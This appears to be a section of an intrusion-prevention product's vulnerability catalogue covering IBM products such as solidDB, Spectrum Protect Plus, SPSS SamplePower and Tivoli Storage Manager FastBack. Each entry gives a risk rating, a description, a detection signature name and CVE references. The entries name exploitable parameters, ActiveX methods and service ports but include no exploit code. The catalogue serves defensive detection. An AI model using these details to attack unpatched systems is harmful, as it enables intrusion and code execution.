IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure

About this vulnerability:

A vulnerability in IBM Rational Focal Point

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1345-5242

Platform:

Generic

Software:

IBM Focal Point

Type:

Input Validation

Description:

There is an information disclosure vulnerability in IBM Rational Focal Point. The vulnerability is due to an input validation error of the file variable in com.telelogic.focalpoint.pres.controller.LoginController servlet. A remote, unauthenticated attacker could exploit this vulnerability to read the configuration files of the Webservice Axis Gateway of Focal Point.

Situation:

HTTP_CRL-IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure

References:

CVE-2013-5397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5397

BID-64338
http://www.securityfocus.com/bid/64338

OSVDB-101023
http://www.osvdb.org/101023

IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure

About this vulnerability:

A vulnerability in IBM Rational Focal Point

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1345-5242

Platform:

Generic

Software:

IBM Focal Point

Type:

Input Validation

Description:

There is an information disclosure vulnerability in IBM Focal Point. The vulnerability is due to input validation error of file variable in com.telelogic.focalpoint.pres.controller.RequestAccessController servlet. A remote unauthenticated attacker could exploit this vulnerability to read the configuration files of the Webservice Axis Gateway of Focal Point.

Situation:

HTTP_CSU-IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure

References:

CVE-2013-5398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5398

BID-64339
http://www.securityfocus.com/bid/64339

OSVDB-101024
http://www.osvdb.org/101024

IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass

About this vulnerability:

A vulnerability in IBM Rational Quality Manager and Test Lab Manager

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

IBM Rational Quality Manager and Test Lab Manager

Type:

Malfunction

Description:

A policy bypass vulnerability exists in IBM Rational Quality Manager and Test Lab Manager.

Situation:

HTTP_CSH-IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass

References:

BID-44172
http://www.securityfocus.com/bid/44172

IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in Blueberry BB FlashBack SDK FBRecorder

Risk:

Moderate

First detected in:

sgpkg-ips-439-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Blueberry FlashBack SDK FBRecorder; IBM Rational Rhapsody

Type:

Malfunction

Description:

There are multiple vulnerabilities in the BB FlashBack FBRecorder ActiveX control, which is shipped as a component of IBM Rational Rhapsody. A remote, unauthenticated attacker could exploit these vulnerabilities by enticing a user to visit a malicious website leveraging an insecure method of the ActiveX control. Successful exploitation may result in execution of arbitrary code in the security context of the target user.

Situation:

File-Text_IBM-Rational-Rhapsody-Bb-Flashback-Fbrecorder-Multiple-Vulnerabilities

References:

CVE-2011-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1388

BID-51184
http://www.securityfocus.com/bid/51184

OSVDB-77994
http://www.osvdb.org/77994

IBM-solidDB-Denial-Of-Service

About this vulnerability:	A vulnerability in IBM SolidDB allowing denial of service
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IBM SolidDB
Type:	Malfunction
Description:	A vulnerability exists in IBM SolidDB where an attacker could send a custom TCP packets causing a denial of service condition where the solid.exe daemon will crash. Fingerprint is for all three ag_soliddb_dos exploits.
Situation:	Generic_CS-IBM-solidDB-Denial-Of-Service

IBM-solidDB-Logging-Function-Format-String

About this vulnerability:

Format string vulnerability in the IBM solidDB database server product

Risk:

High

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

IBM SolidDB

Type:

Format String

Description:

There is a format string vulnerability in the IBM solidDB database server product. By sending a malicious message with a specially crafted Username or Host string field, a remote unauthenticated attacker can terminate the database server to cause a denial of service condition or to execute arbitrary code on the target host.

Situation:

Generic_CS-IBM-solidDB-Logging-Function-Format-String

References:

CVE-2008-1705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1705

BID-28468
http://www.securityfocus.com/bid/28468

OSVDB-43778
http://www.osvdb.org/43778

IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service

About this vulnerability:

An IBM solidDB Redundant Where Clause Denial Of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux; Solaris

Software:

IBM SolidDB

Type:

Malfunction

Description:

A vulnerability in IBM solidDB which allows remote attackers to cause a denial of service condition by sending a crafted SQL command to the target server, due to a design weakness when handling a statement that contains a redundant WHERE clause.

Situation:

Generic_CS-IBM-solidDB-Redundant-Where-Clause-Denial-Of-Service

References:

CVE-2012-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0200

IBM-solidDB-Rownum-Subquery-Denial-Of-Service

About this vulnerability:

A vulnerability in IBM SolidDB

Risk:

Moderate

First detected in:

sgpkg-ips-439-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SolidDB

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in IBM's solidDB. The vulnerability is due to a design weakness when handling a SELECT statement that contains a rownum condition with a subquery. A remote authenticated attacker could exploit this vulnerability by sending crafted SQL command to the target server. Successful exploitation may allow the attacker to crash the solid DB server resulting in a denial-of-service condition.

Situation:

Generic_CS-IBM-solidDB-Rownum-Subquery-Denial-Of-Service

References:

BID-51629
http://www.securityfocus.com/bid/51629

IBM-solidDB-Solid.exe-Authentication-Bypass

About this vulnerability:

A vulnerability in IBM SolidDB

Risk:

Moderate

First detected in:

sgpkg-ips-388-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM SolidDB

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in IBM's solidDB. The authentication protocol used by the product allows a remote attacker to specify the length of a password hash which can be abused to bypass authentication to the database. A remote unauthenticated attacker could exploit this vulnerability by specifying a small password hash length value and fuzzing the password hash. Successful exploitation may allow the attacker to bypass authentication to the database.

Situation:

Generic_CS-IBM-solidDB-Solid.exe-Authentication-Bypass

References:

BID-47137
http://www.securityfocus.com/bid/47137

IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection

About this vulnerability:

A vulnerability in IBM Spectrum Protect Plus

Risk:

Moderate

First detected in:

sgpkg-ips-1272-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Spectrum Protect Plus

Type:

Input Validation

Description:

There exists a command injection vulnerability in IBM Spectrum Protect Plus. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection

References:

CVE-2020-4212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4212

IBM-Spectrum-Protect-Plus-Hostname-Command-Injection

About this vulnerability:

A vulnerability in IBM Spectrum Protect Plus

Risk:

High

First detected in:

sgpkg-ips-1274-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Spectrum Protect Plus

Type:

Input Validation

Description:

There exists a vulnerability in IBM Spectrum Protect Plus, versions 10.1.0-10.1.5, which allows remote attackers to execute arbitrary code by sending a specially crafted request, due to the lack of user input validation of the hostname parameter.

Situation:

HTTP_CRL-IBM-Spectrum-Protect-Plus-Hostname-Command-Injection

References:

CVE-2020-4211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4211

IBM-Spectrum-Protect-Plus-Timezone-Command-Injection

About this vulnerability:

A vulnerability in IBM Spectrum Protect Plus

Risk:

High

First detected in:

sgpkg-ips-1285-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Spectrum Protect Plus

Type:

Input Validation

Description:

A command injection vulnerability exists in IBM Spectrum Protect Plus. The vulnerability is due to a lack of input validation in the Administrative Console service when parsing the timezone parameter. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted request to a target system. Successful exploitation could lead to arbitrary code execution in the context of the root user.

Situation:

HTTP_CRL-IBM-Spectrum-Protect-Plus-Timezone-Command-Injection

References:

CVE-2020-4206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4206

IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection

About this vulnerability:

A vulnerability in IBM Spectrum Protect Plus

Risk:

Moderate

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Spectrum Protect Plus

Type:

Input Validation

Description:

Improper input validation in the Administrative Console service causes a command injection vulnerability when parsing the filename parameter in the uploadHttpsCertificate method. A successful exploit allows an attacker to execute arbitrary commands with root privileges.

Situation:

HTTP_CS-IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection

References:

CVE-2020-4241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4241

IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM IBM SPSS SamplePower

Risk:

Moderate

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SPSS SamplePower

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied TabCaption value in the c1sizer ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_IBM-SPSS-Samplepower-C1sizer-ActiveX-Control-Buffer-Overflow

References:

CVE-2012-5946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5946

BID-59559
http://www.securityfocus.com/bid/59559

OSVDB-92845
http://www.osvdb.org/92845

IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM IBM SPSS SamplePower

Risk:

Moderate

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SPSS SamplePower

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex7I ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_IBM-SPSS-Samplepower-Vsflex7l-ActiveX-Control-Buffer-Overflow

References:

CVE-2012-5947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5947

BID-59556
http://www.securityfocus.com/bid/59556

OSVDB-92846
http://www.osvdb.org/92846

IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM IBM SPSS SamplePower

Risk:

Moderate

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SPSS SamplePower

Type:

Buffer Overflow

Description:

There is a global buffer overflow vulnerability in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex8l ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_IBM-SPSS-Samplepower-Vsflex8l-ActiveX-Control-Buffer-Overflow

References:

CVE-2012-5945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5945

BID-59557
http://www.securityfocus.com/bid/59557

OSVDB-92844
http://www.osvdb.org/92844

IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM IBM SPSS SamplePower

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SPSS SamplePower

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM SPSS SamplePower. The vulnerability is due to a lack of boundary checking on the user-supplied ComboList or ColComboList property value in the Vsflex8I ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user.

Situation:

File-Text_IBM-SPSS-Samplepower-Vsflex8l.ocx-Combolist-And-Colcombolist-Buffer-Overflow

References:

CVE-2014-0895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0895

IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution

About this vulnerability:

A vulnerability in IBM IBM SPSS SamplePower

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM SPSS SamplePower

Type:

Directory Traversal

Description:

A code execution vulnerability exists in the VsVIEW6.ocx ActiveX control, which is shipped as part of IBM SPSS SamplePower. The method SaveDoc() contains a flaw that could lead to injection and execution of arbitrary code. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious website which can result in the execution of arbitrary code within the context of the target user. If code execution is unsuccessful, a denial of service condition may result.

Situation:

File-Text_IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution

References:

CVE-2012-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0189

BID-51448
http://www.securityfocus.com/bid/51448

OSVDB-78568
http://www.osvdb.org/78568

IBM-System-Director-Agent-DLL-Injection

About this vulnerability:

An IBM System Director Agent DLL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Director Agent

Type:

Directory Traversal

Description:

A vulnerability in IBM System Director Agent, versions before 5.20.3 Service Update 2, which allows remote attackers to load and execute arbitrary local .dll files via a directory traversal to /CMIListener/ in an M-POST request.

Situation:

HTTP_CS-IBM-System-Director-Agent-DLL-Injection

References:

CVE-2009-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0880

BID-34065
http://www.securityfocus.com/bid/34065

OSVDB-52616
http://www.osvdb.org/52616

IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-424-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Directory Server

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in IBM Tivoli Directory Server (TDS). The vulnerability is due to lack of input validation on LDAP CRAM-MD5 packets sent to the affected service. A crafted packet can trigger a buffer overrun that can be leveraged to inject and execute arbitrary code by the attackers. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted LDAP packet to the affected server. Successful exploitation allows the attacker to execute arbitrary code on the server with the privileges of the SYSTEM user.

Situation:

LDAP_CS-IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow

References:

CVE-2011-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1206

BID-47121
http://www.securityfocus.com/bid/47121

IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS

About this vulnerability:

A vulnerability in IBM Tivoli Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Endpoint Manager

Type:

Cross-site Scripting

Description:

A cross-site scripting (XSS) vulnerability has been reported in the Web Reports component of IBM's Tivoli Endpoint Manager. The vulnerability is due to a lack of sanitization of the ScheduleParam HTTP parameter. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt will result in the execution of script code in the security context of a target user's browser, with the possible effect of performing a malicious operation on the vulnerable Web Reports server.

Situation:

HTTP_CRL-IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS

References:

CVE-2012-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0719

BID-52514
http://www.securityfocus.com/bid/52514

OSVDB-80078
http://www.osvdb.org/80078

IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection

About this vulnerability:

A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Provisioning Manager Express for Software Distribution

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in IBM Tivoli Provisioning Manager Express. The vulnerability is due to insufficient input sanitation in the Asset.getMimeType function when processing HTTP requests sent to the getAttachment servlet. A remote attacker can exploit this SQL injection vulnerability to read data from the database including the SHA1 encrypted admin password, and then upload file to the server and execute code under the context of the SYSTEM user.

Situation:

HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection

References:

CVE-2012-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0199

OSVDB-79735
http://www.osvdb.org/79735

IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution

Risk:

Moderate

First detected in:

sgpkg-ips-448-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Provisioning Manager Express for Software Distribution

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution. Specifically, the flaw is in the way the Isig.isigCtl.1 ActiveX Control parses data supplied to the RunAndUploadFile() method. A remote attacker can exploit this vulnerability by enticing a user to visit a malicious web site. Successful exploitation allows arbitrary code execution under the security context of the current user.

Situation:

File-Text_IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-BOF

References:

CVE-2012-0198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0198

OSVDB-79735
http://www.osvdb.org/79735

IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection

About this vulnerability:

A vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Provisioning Manager Express for Software Distribution

Type:

SQL Injection

Description:

An SQL Injection vulnerability exists in IBM Tivoli Provisioning Manager Express. The vulnerability is due to insufficient input sanitation in the User.updateUserValue function when processing HTTP requests sent to the register.do servlet. A remote attacker can exploit this SQL injection vulnerability to update their Authority level to the ADMIN level, and then upload a file to the server and execute code under the context of the SYSTEM user.

Situation:

HTTP_CS-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection

References:

CVE-2012-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0199

OSVDB-79731
http://www.osvdb.org/79731

IBM-Tivoli-Provisioning-Manager-OS-Deployment-Buffer-Overflow

About this vulnerability:

IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Buffer Overflow Vulnerabilities

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Provisioning Manager for OS Deployment

Type:

Buffer Overflow

Description:

IBM Tivoli Provisioning Manager for OS Deployment is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to properly bounds-check user-supplied input. This allows remote attackers to execute arbitrary code or cause a denial of service.

Situation:

HTTP_CSU-IBM-Tivoli-Provisioning-Manager-OS-Deployment-BOF

References:

CVE-2007-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1868

BID-23264
http://www.securityfocus.com/bid/23264

IBM-Tivoli-Storage-Fastback-Server-Opcode-1335-Format-String-Vulnerability

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Format String

Description:

An attacker may gain the ability to run arbitrary code on the system by exploiting a vulnerability in the format string processing.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1335-Format-String-Vulnerability

References:

CVE-2015-1953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1953

IBM-Tivoli-Storage-Manager-Agent-Client-Generic-String-Handling-Buffer-Overflow

About this vulnerability:

IBM Tivoli Storage Manager Agent Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Tivoli Storage Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager Agent Client. The vulnerability is due to a boundary error in a generic string handling function when parsing strings from request packets. This vulnerability can be exploited to cause stack-based buffer overflow. Successful exploitation allows execution of arbitrary code. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

Generic_IBM-Tivoli-Storage-Manager-Agent-Buffer-Overflow

References:

CVE-2008-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4828

BID-34803
http://www.securityfocus.com/bid/34803

OSVDB-54232
http://www.osvdb.org/54232

OSVDB-54231
http://www.osvdb.org/54231

IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in IBM Tivoli Storage Manager Client

Risk:

High

First detected in:

sgpkg-ips-269-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager Client; IBM Tivoli Storage Manager Express Client

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM Tivoli Storage Manager Client software. The vulnerability is due to a boundary error in the Client Acceptor Daemon (CAD) service when processing specially-crafted packets. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the target system. Successful exploitation of this vulnerability allows arbitrary code execution with the SYSTEM privileges of the CAD service.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Client-CAD-Service-Buffer-Overflow

References:

CVE-2009-3853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3853

IBM-Tivoli-Storage-Manager-Client-dsmagent.exe-NodeName-Buffer-Overflow

About this vulnerability:

IBM Tivoli Storage Manager Client NodeName Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-354-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Tivoli Storage Manager

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager Client. The vulnerability is due to a boundary error when copying the NodeName from a request packet. This vulnerability can be exploited to cause a stack-based buffer overflow and can allow execution of arbitrary code. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, which is SYSTEM on Windows platform. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

Generic_IBM-Tivoli-Storage-Manager-Client-Dsmgent-Buffer-Overflow

References:

CVE-2008-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4828

BID-34803
http://www.securityfocus.com/bid/34803

OSVDB-54232
http://www.osvdb.org/54232

OSVDB-54231
http://www.osvdb.org/54231

IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager (TSM) Enterprise Server

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager Enterprise Server; IBM Tivoli Storage Manager Express Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM Tivoli Storage Manager.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

References:

CVE-2008-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4563

BID-34077
http://www.securityfocus.com/bid/34077

OSVDB-52617
http://www.osvdb.org/52617

IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service

About this vulnerability:

An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected

Risk:

High

First detected in:

sgpkg-ips-1868-5242

Last changed:

sgpkg-ips-1868-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Malfunction

Description:

The server in IBM Tivoli Storage Manager FastBack 5.5.x and 6.x before 6.1.12.2 allows remote attackers to cause a denial of service (service crash) via crafted packets to a TCP port.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Denial-Of-Service-CVE-2015-8523

References:

CVE-2015-8523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8523

IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-644-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to insufficient input validation of opcode 0x09 messages before copying user-supplied data into a stack buffer. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 30051/TCP. Successful exploitation can result in arbitrary code execution within the security context of the System user.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow

References:

CVE-2015-0119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0119

IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Malfunction

Description:

A code execution vulnerability has been reported in IBM Tivoli Storage Manager FastBack. The vulnerability is due to an arbitrary memory accessing in Fastback Mount Service (FastBackMount.exe) which listens by default on UDP port 30005. Remote attackers can exploit this vulnerability by sending multiple requests to this service which leads to corruption of the service memory. Successful exploitation results in code execution with System level privileges.

Situation:

Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-Code-Execution
Generic_UDP-IBM-Tivoli-Storage-Manager-Fastback-Mount-Service-DoS

References:

CVE-2010-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3058

BID-42549
http://www.securityfocus.com/bid/42549

IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-649-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to insufficient input validation of parameters to the CRYPTO_S_EncryptBufferToBuffer function. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to port 30051/TCP. Successful exploitation results in arbitrary code execution within the context of SYSTEM.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow

References:

CVE-2015-0120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0120

BID-74021
http://www.securityfocus.com/bid/74021

IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Malfunction

Description:

A stack-based buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Mount. The vulnerability is due to improper bounds checking by the FastBackMount process. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests. Successful exploitation can result in arbitrary code execution within the security context of the System user.

Situation:

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow

References:

CVE-2015-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1896

OSVDB-120349
http://www.osvdb.org/120349

IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow

About this vulnerability:	IBM Tivoli Storage Manager Fastback Server Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-913-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IBM Tivoli Storage Manager FastBack
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in IBM Tivoli Storage Manager FastBack Server which allows remote attackers to execute arbitrary code via a crafted command.
Situation:	Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow

IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929

About this vulnerability:

A vulnerability in IBM Tivoli Storage Manager FastBack

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

IBM Tivoli Storage Manager FastBack

Type:

Buffer Overflow

Description:

